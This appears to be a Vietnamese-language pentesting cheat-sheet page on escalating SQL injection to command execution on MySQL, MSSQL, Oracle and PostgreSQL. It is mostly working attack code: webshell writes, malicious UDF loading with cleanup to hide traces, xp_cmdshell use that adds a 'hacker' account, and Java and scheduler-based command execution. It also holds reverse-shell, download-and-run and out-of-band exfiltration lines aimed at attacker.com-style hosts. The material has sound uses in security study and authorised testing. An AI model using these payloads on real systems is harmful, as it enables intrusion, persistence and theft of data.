Injection

MySQL

1. SELECT ... INTO OUTFILE

SELECT ... INTO OUTFILE writes the selected rows to a file. Column and line terminators can be specified to produce a specific output format. Tham khảo

Ví dụ:

-- Linux server
SELECT '<?php system($_GET["cmd"]); ?>' 
INTO OUTFILE '/var/www/html/shell.php'

-- Windows server  
SELECT '<?php system($_GET["cmd"]); ?>' 
INTO OUTFILE 'C:\\xampp\\htdocs\\shell.php'

Điều kiện:
User (account mà web app sử dụng để kết nối đến database) phải có quyền FILE privilege
Biến secure_file_priv phải được cấu hình cho phép (empty hoặc trỏ đến thư mục có thể ghi) (MySQL >= 5.5.53 biến này mặc định là NULL --> disable import export operator, còn MySQL < 5.5.53 thì ngược lại) tham khảo
Biết đường dẫn thư mục web root của server

2. Sử dụng User Defined Functions (UDF)

User Defined Functions là cách để mở rộng chức năng của MySQL bằng cách tạo các hàm tùy chỉnh từ thư viện động (shared library). UDF cho phép thực thi mã native từ bên trong MySQL.

Ta có 2 cách để upload libc độc hại lên plugin của MySQL

Cách 1:

Ghi đè libc trực tiếp vào plugin của MySQL tại đường dẫn của nó (/usr/lib/mysql/plugin/) như bài sau:

Simple MySQL Backdoor using User Defined Functions (UDF) | Thales Cyber Services ANZ GroupThales Cyber Services ANZ

Cách 2:

Ghi dữ liệu của file libc vào folder plugin của Mysql thông qua DUMPFILE

Tham khảo: https://www.exploit-db.com/docs/english/44139-mysql-udf-exploitation.pdf?rss

Ngoài ra thì có thể ghi nó qua các Query:

-- Tạo bảng tạm để chứa dữ liệu binary
USE mysql;
CREATE TABLE temp(data LONGBLOB);

-- Chèn nội dung file UDF đã encode hex
INSERT INTO temp(data) VALUES (0x4d5a90000300000004000000ffff0000b80000000000000040000000...);

-- Ghi file UDF vào thư mục plugin
SELECT data FROM temp INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

Cách thức để call function trong libc đó thì chúng đều giống nhau

Đầu tiên là tạo hàm

CREATE FUNCTION sys_exec RETURNS int SONAME 'udf.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'udf.so';

Cuối cùng là bước thực thi command:

-- sys_exec: trả về exit code
SELECT sys_exec('whoami');

-- sys_eval: trả về output của lệnh  
SELECT sys_eval('id');

-- remove function để che dấu vết
DROP FUNCTION sys_exec;

Ngoài ra còn có LOAD_FILE, nó cũng tương tự như INTO DUMPFILE và INTO OUTFILE

Microsoft SQL Server

1. Sử dụng `xp_cmdshell` để thực thi lệnh hệ thống

xp_cmdshell là một extended stored procedure cho phép thực thi lệnh shell Windows từ bên trong MSSQL. Kẻ tấn công có thể lợi dụng SQLi để kích hoạt nó, dẫn đến RCE với quyền hạn của tài khoản dịch vụ SQL Server (thường là NT AUTHORITY\SYSTEM hoặc NT SERVICE\MSSQLSERVER)
Điều kiện:
Tài khoản MSSQL phải có quyền sysadmin (như SA).
xp_cmdshell mặc định bị vô hiệu hóa từ SQL Server 2005 trở lên.
Cần kích hoạt qua sp_configure

Đầu tiên, ta cần kích hoạt xp_cmdshell qua SQLi

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Sau đó run command:

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user hacker Passw0rd /add';

Ngoài ra nó còn làm được nhiều kỹ thuật khác như: Drop File, Reverse Shell

2. Khai Thác Qua Các Stored Procedure Khác

Nguyên Lý Hoạt Động
sp_OACreate: Tạo instance của đối tượng OLE (như WScript.Shell), cho phép chạy lệnh hệ thống.
Kết hợp với sp_OAMethod để gọi phương thức như 'run' để thực thi lệnh.
Điều Kiện Thực Hiện
Cần quyền sysadmin để kích hoạt 'Ole Automation Procedures' qua sp_configure.
Chạy với quyền của tài khoản dịch vụ SQL Server (thường cao).

EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @myshell INT; 
EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; 
EXEC sp_oamethod @myshell, 'run', null, 'cmd /c whoami > c:\output.txt';
-- Hoặc: --
EXEC sp_OAMethod @shell, 'Run', NULL, 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://attacker.com/shell.ps1'')"' ;

Oracle SQL

1. Tạo và Thực thi Java Stored Procedure

Java Stored Procedure (JSP) là phương thức Java được biên dịch và lưu trữ bên trong cơ sở dữ liệu Oracle. Oracle cho phép tạo Java stored procedure, qua đó có thể gọi các hàm Java để thực thi lệnh hệ thống với câu lệnh SQL
Điều kiện:
Tài khoản phải có quyền CREATE PROCEDURE và JAVA, hoặc đủ quyền DBA.
Oracle JVM (Java Virtual Machine) phải khả dụng trên database.
Trong môi trường production, quyền này thường chỉ có ở SYSDBA hoặc các user đặc biệt.

Ví dụ:

Đây là cách tạo hàm Java thực thi command cmd:

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "ExecOS" AS
public class ExecOS {
  public static String runCmd(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
  }
};

Tạo wrapper PL/SQL procedure để gọi hàm Java đó

CREATE OR REPLACE FUNCTION run_os_cmd(cmd IN VARCHAR2)
  RETURN VARCHAR2 AS LANGUAGE JAVA
  NAME 'ExecOS.runCmd(java.lang.String) return java.lang.String';

Sau đó execute hàm run_os_cmd:

SELECT run_os_cmd('id') FROM dual;

2. Lạm Dụng Các Gói PL/SQL Được Cấp Quyền

Oracle cung cấp một số package PL/SQL như UTL_FILE, UTL_HTTP, UTL_SMTP, DBMS_SCHEDULER cho phép thao tác với hệ thống file, gửi request HTTP, hoặc lập lịch tác vụ.

UTL_FILE

Ví dụ tạo file WebShell.

DECLARE
  f UTL_FILE.FILE_TYPE;
BEGIN
  f := UTL_FILE.FOPEN('/var/www/html', 'shell.jsp', 'w');
  UTL_FILE.PUT_LINE(f, '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>');
  UTL_FILE.FCLOSE(f);
END;

Cần user được cấp quyền ghi file.

UTL_HTTP hoặc UTL_INADDR

Ví dụ với Out-Of-Band

SELECT UTL_HTTP.REQUEST('http://attackerhost/recon?data='||(SELECT user FROM dual)) FROM dual;

DBMS_SCHEDULER/DBMS_JOB

Ví dụ tạo shell script được lên lịch sẵn

BEGIN
  DBMS_SCHEDULER.create_job(
    job_name        => 'hackjob',
    job_type        => 'EXECUTABLE',
    job_action      => '/bin/bash',
    number_of_arguments => 1,
    start_date      => SYSTIMESTAMP,
    repeat_interval => NULL,
    enabled         => TRUE,
    auto_drop       => TRUE,
    comments        => 'RCE'
  );
  DBMS_SCHEDULER.set_job_argument_value('hackjob',1, ' -c "curl attacker.com/shell.sh|bash"');
  DBMS_SCHEDULER.enable('hackjob');
END;

Thường chỉ user quyền cao mới dùng được

PostgreSQL

Ta có 3 nhóm kỹ thuật thường gặp:

1. Ghi tệp/đọc tệp rồi import libc C

Điều kiện
Tài khoản superuser hoặc chỉ cần CREATE FUNCTION + quyền ghi thư mục đích (qua COPY/lo_import).
Phiên bản ≤ 13 dễ khai thác hơn do ít ràng buộc đường dẫn thư viện.

Đối với kỹ thuật này, đầu tiên ta cần ghi .so/.dll lên server bằng COPY ... TO hoặc thả trực tiếp vào bảng: pg_largeobject > lo_export()

Sau đó, export function sys_exec(nếu tồn tại) trong file libc:

CREATE FUNCTION sys_exec(text)
RETURNS int
AS '/tmp/evil.so', 'sys_exec'
LANGUAGE C STRICT;

Cuối cùng là call function sys_exec vừa tạo là xong

SELECT sys_exec('id');

2. COPY ... PROGRAM

PostgreSQL 9.3 → 12.3
Điều kiện:
Superuser hoặc role được gán pg_execute_server_program (PostgreSQL 14+).

Ví dụ:

COPY cmd_out FROM PROGRAM 'bash -c "nc attacker 4444 -e /bin/bash"';

3. Privilege Escalation -> RCE

Ta thường gặp trở ngại khi RCE thì cần phải có acc superuser. Nhưng ta có thể làm theo hướng sau

Leo quyền bằng lỗ hổng CVE-2024-2338 để biến role thành superuser

Sau đó thực hiện cách (1) và (2)

PreviousSetting Up NextBWAPP

Last updated 4 months ago

Was this helpful?

Good afternoon